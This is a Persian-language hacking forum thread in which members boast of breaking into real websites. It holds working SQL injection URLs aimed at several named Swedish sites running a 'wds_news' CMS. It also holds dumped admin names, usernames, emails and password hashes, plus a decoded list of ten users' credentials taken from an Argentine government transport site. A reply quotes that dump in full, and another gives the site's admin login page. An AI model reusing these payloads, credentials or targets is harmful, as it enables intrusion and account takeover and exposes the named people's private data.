http://nidelva.se/wds_news/article.php?ID=-12+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://dromvavaren.se/wds_news/article.php?ID=-1+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+
http://maskinconsulting.se/wds_news/article.php?ID=-15+UNION+SELECT+1,%28select%20%28@x%29%20from%20%28select%20%28@x:=0x00%29,%28select%20%280%29%20from%20%28cms_admin%29%20where%20%280x00%29%20in%20%28@x:=concat%28@x,0x3c62723e,0x3c666f6e7420636f6c6f723d22677265656e223e204944203a20,admin_id,0x3c666f6e7420636f6c6f723d22626c7565223e206e616d65203a20,full_name,0x3c666f6e7420636f6c6f723d226f72616e6765223e20557365726e616d65203a20,username,0x3c666f6e7420636f6c6f723d22726564223e2050617373776f7264203a20,password,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b31223e3c63656e7465723e496e6a656374656420427920426c61636b776f6c665f4972616e3c2f63656e7465723e3c2f666f6e743e3c62723e3c68723e%29%29%29%29x%29,3,4,5,6,7,8,9,10--+

یوزر و پسورد ادمین + تارگت های بالا :

http://www.wrangel.org/

ID : 14 name : Magnus von Stapelmohr Username : mvs@comhem.se Password : f4db6f4c33284e474f1ac5819ecc6ab9a0360269

ID : 8 name : CG Wrangel Username : bosscop@hotmail.com Password : 1360040c19013c7193f28f7db72a2fe54293841a

ID : 9 name : G�sta Wrangel Username : gwrangel@tele2.se Password : 82eee697185186209d0115bd7551c36c7e9ef024

http://wallarp.se

ID : 8 name : Tony Michaelsson Username : wds Password : 8eee0de15eda4e006b75c2052f26ac154a789a91

ID : 9 name : Ingela Arpi Username : wallarpwebb Password : 41b0f5b516f0000cd5ab7a02e0083bcc9863759b

http://demo.webdesignskolan.se/

ID : 17 name : Tony Michaelsson Username : info@webdesignskolan.se Password : 0ad7bb4d8417918c75da0998db823cb8b36e021a

http://johanneshovsjuristen.se/

ID : 6 name : Tony Michaelsson Username : wds Password : 50403c287adaa463a9215c10eca7acd09a0d8e6b

ID : 7 name : Jarl Nylund Username : jarl.nylund@juristpunkten.se Password : 4f5588ee6b2617e0a440d3d29c278d69bc80fa7c

http://feka.se/

ID : 13 name : Lena Nyl�n Username : lenab Password : ac20c264ab3026fadcc0dc1452cc8bde80ad0bc7

ID : 9 name : Tony Michaelsson Username : wds Password : ee06ec8ad2ea9853534ede68c7402f14f0b68a89

http://friendsofkabondo.se/

ID : 30 name : Bo Oscarsson Username : BoO3 Password : 8171edb883b4ba65fecaca6c118438d64fd10b4b

ID : 28 name : Ingrid �dman Username : Ingrid Password : fefde1d4c404e1861801d9996ee018cfc6d62589

ID : 29 name : Margareta Halfvarson Username : Margareta Password : fefde1d4c404e1861801d9996ee018cfc6d62589

http://nidelva.se/

ID : 9 name : Tony Michaelsson Username : wds Password : cf545fe0285e551a2f58451bba2a260e3a38a080

ID : 11 name : Jan-Erik Wennerberg Username : jan-erik.wennerberg@oktv.se Password : 6b5fa60ef227aec2f9c8eccdaabe1c0e4a264f92

ID : 12 name : Paula Arvola Username : Paula Password : 863fd97168989d77fd30b7cfc94ed103e430423c

http://dromvavaren.se/

ID : 3 name : Tony Michaelsson Username : info@webdesignskolan.se Password : 0ad7bb4d8417918c75da0998db823cb8b36e021a

http://maskinconsulting.se

ID : 6 name : Tony Michaelsson Username : wds Password : 171653bcee403872ce0dbb3eac2fa9f2161838d0

ID : 7 name : Jan-Olov Kihl Username : janne@maskinconsulting.se Password : 282dbeef3c591722f648b8a217dac4e90f38b4a5

موفق باشید.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#18 ارسالی 03 فوریه 2016 - 08:20

  OFFLINE
  تاریخ عضویت :
  16 نوامبر 2015
 • Professional Hacker
 • Super Moderator
 • 596 ارسال
  Last Visit مارس 06 2018 11:51
 • Slogan : SEC_RITY is not complete without U!
 • Country :
 • Gender : Male
 • Location : IN YOUR SYSTEM
 • Name : Lord Black

*
پست محبوب

خب ی دامنه گاو دیگه =)) تارگت : 

www.transporte.mendoza.gov.ar

با تشکر از دوستمون که توی تاپیک target training قرار دادن تارگت اسیب پذیر رو نفوذش با خودم بود.

یکم حرفه ای بود زدنش. این یکی با بقیه فرق داشت چرا که ستون اسیب پذیر در ی جایی موقع اینجکت مخفی میشد که من پیداش کردم و تونستم دیتابیس ادمین رو بکشم بیرون

خب فعلا پریویت میمونه و نمیگم راه نفوذشو

فقط صفحه آخر رو میدم بهتون که دیتابیس ادمین در اونجا قراره داره یعنی لینک اینجکت اصلی رو نمیدم چون ی جورایی برای اینکه اطلاعات بکشی بیرون باید دایرکت میشدی به ی صفحه دیگه

من اون صفحه رو میدم بهتون - لینک اینجکت + یوزر و پسورد Url دیکد شده

چون توی اون صفحه به صورت کد نمایش داده میشد که من دیکدش کردم

لینک اون صفحه :

http://www.transporte.mendoza.gov.ar/includes/thumb.php?src=uploads/%EF%BF%BD%3Cbr%3E%20ID%20:%201%20Name%20:%20Pablo%20Lname%20:%20Vargas%20Password%20:%20mMzbysTd2NU=%20Email%20:%20pvargas@bigbrand.com.ar%3Cbr%3E%20ID%20:%202%20Name%20:%20Karina%20Lname%20:%20Jaureguiberry%20Password%20:%20lJWgl5ij%20Email%20:%20tanuri@hotmail.com%3Cbr%3E%20ID%20:%203%20Name%20:%20Fernando%20Lname%20:%20Rodriguez%20Password%20:%20lJWgl5ij%20Email%20:%20fersystem@gmail.com%3Cbr%3E%20ID%20:%204%20Name%20:%20Laura%20Lname%20:%20Guevara%20Password%20:%20lJWgl5ij%20Email%20:%20guevaralauri@gmail.com%3Cbr%3E%20ID%20:%205%20Name%20:%20Vanesa%20Lname%20:%20Egarrat%20Password%20:%20rcTi2cjbp8TZ2czh%20Email%20:%20vaneegarrat@hotmail.com%3Cbr%3E%20ID%20:%206%20Name%20:%20Dario%20Lname%20:%20Ramos%20Password%20:%20lJWflw==%20Email%20:%20dramos@mendoza.gov.ar%3Cbr%3E%20ID%20:%207%20Name%20:%20Angel%20Lname%20:%20Indovino%20Password%20:%20lJWgl5ij%20Email%20:%20web5226@gmail.com%3Cbr%3E%20ID%20:%208%20Name%20:%20Mar%C3%ADa%20Julieta%20Lname%20:%20Olivares%20Password%20:%20lJWgl5ij%20Email%20:%20mariajulietaolivares@gmail.com%3Cbr%3E%20ID%20:%209%20Name%20:%20Martin%20Lname%20:%20Santos%20Password%20:%20lJWgl5ij%20Email%20:%20martin@ultimamilla.com.ar%3Cbr%3E%20ID%20:%2010%20Name%20:%20trekking%20Lname%20:%20aconca%20Password%20:%20lJWgl5ij%20Email%20:%20trekking.aconca@gmail.com&w=220&h=152

ی شات از اون صفحه :

 

88prsbq7nwz8rvzibyn.jpg

 

دیتابیس یوزر و پسورد به صورت دیکد شده :

ID : 1 Name : Pablo Lname : Vargas Password : mMzbysTd2NU= Email : pvargas@bigbrand.com.ar
 ID : 2 Name : Karina Lname : Jaureguiberry Password : lJWgl5ij Email : tanuri@hotmail.com
 ID : 3 Name : Fernando Lname : Rodriguez Password : lJWgl5ij Email : fersystem@gmail.com
 ID : 4 Name : Laura Lname : Guevara Password : lJWgl5ij Email : guevaralauri@gmail.com
 ID : 5 Name : Vanesa Lname : Egarrat Password : rcTi2cjbp8TZ2czh Email : vaneegarrat@hotmail.com
 ID : 6 Name : Dario Lname : Ramos Password : lJWflw== Email : dramos@mendoza.gov.ar
 ID : 7 Name : Angel Lname : Indovino Password : lJWgl5ij Email : web5226@gmail.com
 ID : 8 Name : Marà a Julieta Lname : Olivares Password : lJWgl5ij Email : mariajulietaolivares@gmail.com
 ID : 9 Name : Martin Lname : Santos Password : lJWgl5ij Email : martin@ultimamilla.com.ar
 ID : 10 Name : trekking Lname : aconca Password : lJWgl5ij Email : trekking.aconca@gmail.com

خب

ارادت Blackwolf_Iran

موفق باشید.


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#19 ارسالی 03 فوریه 2016 - 08:39

darkness
+848
  OFFLINE
  تاریخ عضویت :
  30 سپتامبر 2015
 • DarknesS HackeR
 • VIP
 • 329 ارسال
  Last Visit ژوئیه 04 2017 05:36
 • Slogan : DARKNESS HACKER
 • Country :
 • Gender : Not Telling
 • Location : IRAN
 • Name : DARKNESS HACKER

خب ی دامنه گاو دیگه =)) تارگت : 

www.transporte.mendoza.gov.ar

با تشکر از دوستمون که توی تاپیک target training قرار دادن تارگت اسیب پذیر رو نفوذش با خودم بود.

یکم حرفه ای بود زدنش. این یکی با بقیه فرق داشت چرا که ستون اسیب پذیر در ی جایی موقع اینجکت مخفی میشد که من پیداش کردم و تونستم دیتابیس ادمین رو بکشم بیرون

خب فعلا پریویت میمونه و نمیگم راه نفوذشو

فقط صفحه آخر رو میدم بهتون که دیتابیس ادمین در اونجا قراره داره یعنی لینک اینجکت اصلی رو نمیدم چون ی جورایی برای اینکه اطلاعات بکشی بیرون باید دایرکت میشدی به ی صفحه دیگه

من اون صفحه رو میدم بهتون - لینک اینجکت + یوزر و پسورد Url دیکد شده

چون توی اون صفحه به صورت کد نمایش داده میشد که من دیکدش کردم

لینک اون صفحه :

http://www.transporte.mendoza.gov.ar/includes/thumb.php?src=uploads/%EF%BF%BD%3Cbr%3E%20ID%20:%201%20Name%20:%20Pablo%20Lname%20:%20Vargas%20Password%20:%20mMzbysTd2NU=%20Email%20:%20pvargas@bigbrand.com.ar%3Cbr%3E%20ID%20:%202%20Name%20:%20Karina%20Lname%20:%20Jaureguiberry%20Password%20:%20lJWgl5ij%20Email%20:%20tanuri@hotmail.com%3Cbr%3E%20ID%20:%203%20Name%20:%20Fernando%20Lname%20:%20Rodriguez%20Password%20:%20lJWgl5ij%20Email%20:%20fersystem@gmail.com%3Cbr%3E%20ID%20:%204%20Name%20:%20Laura%20Lname%20:%20Guevara%20Password%20:%20lJWgl5ij%20Email%20:%20guevaralauri@gmail.com%3Cbr%3E%20ID%20:%205%20Name%20:%20Vanesa%20Lname%20:%20Egarrat%20Password%20:%20rcTi2cjbp8TZ2czh%20Email%20:%20vaneegarrat@hotmail.com%3Cbr%3E%20ID%20:%206%20Name%20:%20Dario%20Lname%20:%20Ramos%20Password%20:%20lJWflw==%20Email%20:%20dramos@mendoza.gov.ar%3Cbr%3E%20ID%20:%207%20Name%20:%20Angel%20Lname%20:%20Indovino%20Password%20:%20lJWgl5ij%20Email%20:%20web5226@gmail.com%3Cbr%3E%20ID%20:%208%20Name%20:%20Mar%C3%ADa%20Julieta%20Lname%20:%20Olivares%20Password%20:%20lJWgl5ij%20Email%20:%20mariajulietaolivares@gmail.com%3Cbr%3E%20ID%20:%209%20Name%20:%20Martin%20Lname%20:%20Santos%20Password%20:%20lJWgl5ij%20Email%20:%20martin@ultimamilla.com.ar%3Cbr%3E%20ID%20:%2010%20Name%20:%20trekking%20Lname%20:%20aconca%20Password%20:%20lJWgl5ij%20Email%20:%20trekking.aconca@gmail.com&w=220&h=152

ی شات از اون صفحه :

 

88prsbq7nwz8rvzibyn.jpg

 

دیتابیس یوزر و پسورد به صورت دیکد شده :

ID : 1 Name : Pablo Lname : Vargas Password : mMzbysTd2NU= Email : pvargas@bigbrand.com.ar
 ID : 2 Name : Karina Lname : Jaureguiberry Password : lJWgl5ij Email : tanuri@hotmail.com
 ID : 3 Name : Fernando Lname : Rodriguez Password : lJWgl5ij Email : fersystem@gmail.com
 ID : 4 Name : Laura Lname : Guevara Password : lJWgl5ij Email : guevaralauri@gmail.com
 ID : 5 Name : Vanesa Lname : Egarrat Password : rcTi2cjbp8TZ2czh Email : vaneegarrat@hotmail.com
 ID : 6 Name : Dario Lname : Ramos Password : lJWflw== Email : dramos@mendoza.gov.ar
 ID : 7 Name : Angel Lname : Indovino Password : lJWgl5ij Email : web5226@gmail.com
 ID : 8 Name : Marà a Julieta Lname : Olivares Password : lJWgl5ij Email : mariajulietaolivares@gmail.com
 ID : 9 Name : Martin Lname : Santos Password : lJWgl5ij Email : martin@ultimamilla.com.ar
 ID : 10 Name : trekking Lname : aconca Password : lJWgl5ij Email : trekking.aconca@gmail.com

خب

ارادت Blackwolf_Iran

موفق باشید.

ادرس صفحه ادیمنو میشه بدید


DARKNESS HACKER

 

id Telegram channel:@baxanonymous
 

01_2.png


#20 ارسالی 03 فوریه 2016 - 09:39

Mr.Khatar
+5,950
  OFFLINE
  تاریخ عضویت :
  23 فوریه 2015
 • Anonymous
 • Leaders
 • 1,630 ارسال
  Last Visit
 • Slogan : Hello Security
 • Country :
 • Gender : Male
 • Location : Security City
 • Name : who am i

ادرس صفحه ادیمنو میشه بدید

 

 

سیستم هسته مرکزی wordpress میباشد که توسط افزونه های امنیتی صفحه لاگین پنل تغییر یافته

http://transportes.mendoza.gov.ar/ingreso/

We Are Iranian Aonymous

 

Google IS BoooooM

 

iranonymous.org_1502978470__download.jpg


1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP